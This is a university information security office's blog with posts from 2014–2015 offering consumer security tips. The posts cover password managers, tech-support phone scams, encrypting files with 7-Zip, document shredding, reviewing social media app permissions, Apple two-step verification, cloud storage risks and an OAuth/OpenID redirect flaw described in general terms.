Information Security News and Events
News, events, views, tips, and hints for keeping your personal information private.
Wednesday, May. 27, 2015
What is a Password Manager Tool?
A password manager tool is software that helps users to encrypt, store, and manage passwords. The tool also helps users to create secure passwords and automatically log into websites.
Who Might Use a Password Manager Tool and Why?
People should use unique passwords for each website or system they login to in order to help minimize the impact from the breach of one website or system. However, most users cannot remember a separate password for many sites and tend to reuse the same password or write them on sticky notes attached to their computer. Password manager tools allow users to more securely manage many distinct passwords and automatically log them into websites.
Benefits to Using a Password Manager Tool
Password manager tools enable users to create and securely maintain unique passwords for websites and other systems without having to memorize or write down passwords.
Risks to Consider When Using a Password Manager Tool
Special care should be taken to secure the password tool since it will grant access to all passwords. The “master” password that grants access to the tool should be a very strong, complex, and unique password; use multifactor authentication if possible. Additional considerations should be made about whether you want your password management tool to store the passwords locally or in the cloud.
List of Technology/Tools That a User Might Consider
Below are three popular password manager tools that an end user might consider for use. Users should evaluate which tool works best for their own unique purposes. The Information Security Office does not recommend the use of a particular tool. End users employ these tools at their own risk.
) is easy to use, supports most popular browsers and mobile devices, offers multifactor authentication options for the master password, notifications for hacked sites, does not share the encryption key with LastPass, provides a password strength indicator, and performs additional password tests like ensuring that you’re not using the same password across multiple sites. However, the ease of use requires that the password database be stored in the cloud. Additionally, as a web-based tool, your password database is available to anyone in the world with an Internet connection and your master password. For this reason, it is strongly recommended that you use multifactor authentication.
) does not share encryption keys with KeePass, provides a password strength indicator, and the password database is not stored in the cloud. Ease of use across multiple devices is a little more complex as the user needs to maintain access to their private password database manually.
) does not share encryption keys with 1Password, provides a password strength indicator, and the password database can be stored in Apple’s iCloud, DropBox or locally on personal devices. Ease of use across multiple devices is easy if stored in the cloud, but more secure if stored locally. The iOS version can be configured to support Touch ID on compatible devices.
Higher Education Reference Pages
University of Illinois at Urbana-Champaign
Adapted with permission from EDUCAUSE and the Higher Education Information Security Council
*not written by the author
Wednesday, Apr. 29, 2015
Not only do cyber criminals send you fradulent (phishing) email messages and set up fake websites, they also may call you on the phone. Often times, they will offer to help solve your (nonexistent) computer problems or sell you a software license. The most common type of phone scams is tech support scams. Cyber criminals can be very persuasive in getting you to trust them. They might know your name and other personal information, usually gained from public phone directories or even through research. They might even guess what operating system you're using. After they have gained your trust, they might ask for your username and password or ask you to go to a website to install software that will let them access your computer to fix it. Once you do this, your computer and your personal information is vulnerable.
Once they have access to your computer, they will be able to do the following things:
- Trick you into installing malicious software that could capture sensitive data, such as online banking user names and passwords. They might also then charge you to remove this software.
- Take control of your computer remotely and adjust settings to leave your computer vulnerable.
- Request credit card information so they can bill you for phony services.
- Direct you to fraudulent websites and ask you to enter credit card and other personal or financial information there.
So how can I protect myself from phone tech support scams?
- If you feel that you have received a fraudulent phone call :
- Do not purchase any software or services.
- Ask if there is a fee or subscription associated with the "service." If there is, hang up.
- Never give control of your computer to a third party unless you can confirm that it is a legitimate representative of a computer support team with whom you are already a customer
- Take the caller's information down and immediately report it to your local authorities.
- Never provide your credit card or financial information.
Friday, Feb. 20, 2015
Need to encrypt your files, but don't have the software to do it? LOOK NO FURTHER! I am here to show you how to encrypt your files!
If you are Mac user, please follow this link (click here) to encrypt your files because the software I will be talking about is for Window users. Alternatively, you can download Keka, which is a free file archiver for Mac OS X, here. Instructions on how to use Keka can be found here.
If you are a Window user, please keep reading. If you use Linux, you can google it or click here: (option 1) or (option 2)
Let's get started. The software that I will be talking about is called 7-Zip.
7-Zip is an open source software used to compress or zip files secured with encryption. Alternatively, you can also use WinZip (click here for WinZip). To download 7-Zip, click here.
After the software as been installed, you can proceed to encrypt a file or folder:
Right click on the file/folder to be encrypted.
Select "7-Zip" and then "Add to archive"
Change the name of the archive you wish to create.
Change the Archieve format to "Zip".
Change the Encryption method to "AES-256". You can also select ZipCrypto, but AES-256 is more secure. However, if AES-256 is selected, the recipient of the zip file may have to install 7-Zip or another zip program to open it. Selecting ZipCrypto allows users to open a zip file in Windows without a zip program.
I strongly recommend that you use AES-256 to protect your data.
Enter a strong password. Here are some tips on how create a strong password: (option 1) or (option 2).
Select "OK" to create the encrypted archive file. This file will be located in same file as the original.
You have encrpyted your file! Congratulations!
*to open the file, you just need to enter the password
Monday, Nov. 10, 2014
Join the Information Security Office and the Markkula Center for Applied Ethics this Thursday for "Treats for Password Changes". Protect your privacy by changing your password and get a treat in return! Cookie Monster approves! #freecookies
Wednesday, Oct. 8, 2014
Free Document Shredding
DATE: Tuesday, Oct 21 - Thursday, Oct 23
TIME: 11:00AM - 1:30PM
WHERE: The shred truck will be parked on Sherman St. in front of Campus Safety Services.
Purpose: Bring your sensitive and outdated paper documents, CDs, and DVDs for secure destruction
Reasons to Shred:
- Shredding keeps personal information confidential
- Shredding helps prevent identity theft and fraud
- Shredding keeps business information confidential
- Shredding is environmentally friendly
- Documents are recycled, saving trees and energy
- Less waste goes to landfills
- Shredding helps organizations comply with Federal and State laws, as well as Industry regulations
- FERPA - Family Educational Rights and Privacy Act
- Protects student information
- HIPPA - Health Insurance Portability and Accountability Act
- Protects patient information
- FACTA - Fair and Accurate Credit Transactions Act
- Protects credit card holder information
- GLBA - Grann Leach Bliley Act
- Protects financial information
- SOX - Sarbanes Oxley Act
- Protects stockholder information
- PCI-DSS - Payment Card Industry Data Security Standard
What should I shred?
· Deposit, ATM, credit card and debit card receipts
· Credit card and bank account statements
· Credit card contracts and other loan agreements
· Documentation of a purchase or sale of stocks, bonds and other investments
· Utility or monthly bills
· Legal Files
· Paycheck Stubs
· Computer Discs
· Computer CD's/DVD’s
· Personnel Records
· Credit Reports
· Tax Records
· Bank Statements
· Legal Contracts
· Medical Records
· Real Estate Form
*Shred Fest is Powered by Pantera Shredding Services
Monday, Jun. 30, 2014
While social media sites such as Facebook and Twitter make it easy to share things with your friends, they also make it easy to log in to various services and applications, too. As authentication brokers, these sites allows for their users to use their account credentials to sign into third-party sites. All the user has to do is to give permission for those sites to access their profile data.
Facebook is a full-blown apps ecosystem. You may have added an app for a promotion or contest, played a game, or added new functionality such as music streaming. In most cases, it just means the app developer has access to some of your profile data. In the worst-case scenario, a malicious developer behind the service can use your account to send out spam.
When was the last time you’ve checked to see what apps have access to your Facebook and Twitter accounts? If you are like most Internet users, you are probably long overdue for a cleanup.
Below, are steps on how to perform an audit. An audit will let you review all the apps on your account and determine if they should still have access.
To see a similar list on Facebook, you need to click on the gear icon on the top right corner of the screen, and then Privacy Settings. Clicking on Apps in the left-column brings up the App Settings page.
The Apps you use section displays all the applications that have access to the account. You can remove applications you are no longer using by clicking on the “x” for each row. If you are still using the app, click on Edit to make sure you are okay with the information the app is collecting and has access to.
Next, check the Apps others use (underneath Apps you use) setting as well, since apps, games, and websites your friends are using can also access your personal details, photos and updates. In this section, you can select which pieces of information your friends’ apps can access. You may not be comfortable with an app you are not using having access to your data. This is your chance to do something about it.
If you are adament about not using Facebook apps, there is another option. After removing every app, if you click on Edit, you can turn the platform off. If you do so, you won’t be able to log in to sites using Facebook or add any apps until you turn it back on.
You can view all the apps that have access to your Twitter account by clicking on the gear icon on the top right hand corner of the Twitter home page. Click on Edit Profile in the drop down menu that appears, and then on Apps in the Profile page’s left column.
This displays a list of applications you’ve granted access to your Twitter account. Are you surprised by the number of apps here? Revoke access to apps that you don’t recognize, or know that you no longer use. If you aren’t sure, remove them anyway. The worst thing that can happen is that the app will prompt you to re-authorize it the next time you need it. And if you never get prompted, then you clearly weren’t using it.
You can revoke an app simply by clicking on the Revoke access button next to each app name. If you make a mistake, you can always re-enable access by clicking on the Undo Revoke Access button.
You reduce your risk of unauthorized use of these apps, cut down on the chances of spammers taking over your account, and even remind yourself of tools and services you may have forgotten about. It’s a good idea to review your apps on a regular basis. Whether that’s once a quarter, twice a year, or annually depends entirely on your app usage. Just don’t neglect this aspect of maintenance. Your data will thank you.
Tuesday, May. 27, 2014
Early Tuesday, a number of Australian iPhone and iPad owners awoke to find their devices locked, with an alert asking for $50 to $100 to give access back.
Moral: It's easier than you think for someone to get into your Apple products -- even if a thief doesn't have the actual iPhone in his or her hands.
How to make yourself much safer?
Start using two-step verification for your Apple ID.
When you enable two-step verification, Apple will make you prove you're actually you whenever you buy anything on iTunes, the App Store or the iBooks Store. It works like this: Apple will text you a code anytime you try to sign into your Apple account to make a purchase. You will then have to input that number to verify your identity. That way, nobody else can access your account unless they have both your password and your device, making it far more difficult to steal your identity and credit card information.
Here's how you do it:
First, go to the Apple ID site, click "Manage your Apple ID" and sign in. From there, click "Password and Security."
From there, you'll see "Two-Step Verification." Under that you should click "Get started..."
There you'll be able to sign up for two-step verification. For security reasons, Apple makes you wait three days after setting up two-step verification for it to take effect. Once you sign up, you'll get an email telling you exactly when you'll be able to use it.
Once you have two-step verification, this is how it works when you sign into Apple to make a purchase:
You'll also get a Recovery Key, which is a 14-digit series of numbers and letters that you can use to access your account if you ever lose access to your iPhone and are unable to receive text messages. Apple recommends you print our your Recovery Key and keep it in a safe place.
Many people don't think about Apple security -- even though the devices and accounts can contain a ton of personal information. Half of iPhone users don't even use their phone's regular passcode, and some people probably still haven't updated their iPhones after a major security flaw was discovered in February. Two-step verification is just one extra way you can protect yourself.
Wednesday, May. 21, 2014
The term "the cloud" can be used to refer to the Internet. Marketers have popularized the phrase "in the cloud" to refer to software, platforms, and infrastructure that are sold as a service. Usually, the seller has servers that host products and services from a remote location, so users don't have to. They can just log on to the network without installing anything. These services may be offered in a public, private, or mixed network. Google, Amazon, IBM, Oracle Cloud, Microsoft Azure, and Dropbox are some examples of cloud vendors.
Cloud services have expanded as more and more users are using the Internet. Cloud services can be quite useful as a cheap "offsite backup". For example, keeping documents or a list of serial numbers of your things in case of a robbery or catastrophic event, such as an earthquake.
Let's use Dropbox for an example.
Dropbox usually requires a username and password to access documents. It even offers a two-factor solution as an option. However, a user can allow others to view a document by sending them a "secret link". But links can be easily leaked. As users rely more on cloud services to share files, with passwords that are too troublesome to set up, leaked links will become more commonplace.
Let's assume that the cloud service works as designed and your username and password is strong enough. But when you share files with other people, you run the risk of others not taking extra care with the files as you would. Their passwords could be weaker than yours or they could share the link onto the Internet.
Although cloud services are good, there are just some information that you shouldn't store into the cloud, such as confidential, personal, finacial, or medical information, unless you encrypt them before uploading.
Here are a couple of ways to "de-cloud" your life:
- Setup an "ownCloud" server. It works very much like Dropbox with mobile clients available for Android and iOS. But you will have to run the server. I suggest you make it accessible via a VPN connection only. Sharepoint may be a similar solution for Windows folks.
- Run your own mail server: This can be a real pain and even large companies move mail services to cloud providers. But pretty much all cloud mail providers will store your data in the clear, and in many ways they have to. Systems to provide real end-to-end encryption for cloud/web-based e-mail are still experimental at this point.
- Offsite backup at a friend's or relative's house. With wide spread use of high speed home network connections, it is possible to setup a decent offsite backup system by "co-locating" a simple NAS somewhere. The disks on the NAS can be encrypted and the connection can use a VPN again.
- For Apple users, make local backups of your devices instead of using iCloud. iCloud stores backups unencrypted and all it takes for an attacker to retrieve a backup is your iCloud username/password.
Monday, May. 12, 2014
Recently,some people at SCU have gotten unsolicited phone calls offering to fix their computers.If that happened to you,make sure you do not do anything the caller asks you to do.It is most likely a phone scam.Even if you wouldn't be fooled, please warn friends and relatives (especially elderly ones) who might not be aware of scams like this. Victims of this fraud could suffer anything from identity theft to having their computer hijacked and used to send spam or viruses without their knowledge.
Where to Report Phone Fraud
- National Do Not Call Registry
The U.S. National Do Not Call Registry allows you to register your phone number. U.S. telemarketers are legally required to check this list; if they call numbers on it, they're liable for prosecution. Enforcement isn't great, but every bit helps.
- FTC Bureau of Consumer Protection - Consumer Information
The Federal Trade Commission doesn't resolve individual consumer complaints, but if there's enough reports of the same fraud, they may be able to go after the scam and shut it down.
What If They Put a Virus on My Computer?
Wednesday, May. 7, 2014
Authentication methods used by Facebook, Google, and many other popular websites could be redirected by attackers.
A security researcher has uncovered serious security vulnerabilities in the technologies used by many websites to authenticate users via third-party websites. A blog posted late last week revealed the details of security flaws in OAuth 2.0 and OpenID, two technologies that are widely used by the Web's most popular sites to more quickly and easily verify the identity of a user.
The vulnerability was discovered by Wang Jing, a PhD student in mathematics at Nanyang Technological University. If you have ever allowed an application or website to verify your identity using your Facebook, Twitter, or Google account, then you have likely used OAuth or OpenID.
OAuth is an open standard for authorization that gives client applications secure, delegated access to server resources on behalf of a resource owner. OpenID an open standard that allows users to be authenticated by certain cooperating sites using a third party service, eliminating the need for webmasters to provide their own authentication systems and allowing users to consolidate their digital identities. The vulnerability could allow an attacker to redirect the "token" used by OAuth 2.0 to access user information on a third-party site, making it possible to steal information such as the email address, age, or location of a user, the blog says. In OpenID, the vulnerability could enable attackers to collect user's information directly.
Google (which uses OpenID) told that the problem has been tracked, while Linkedin said that the company has published a blog on the matter. Microsoft said an investigation has been done and that the vulnerability existed on the domain of a third party and not on its own sites.
While this issue isn't as severe as Heartbleed, its relatively easy to do so unless the flaw gets patched, which is quite difficult to implement due to third party sites having "little incentive" to fix the problem. Cost is a factor, as well as the view that the host company (such as facebook) bears the responsibilty for making the attacks appear more credible.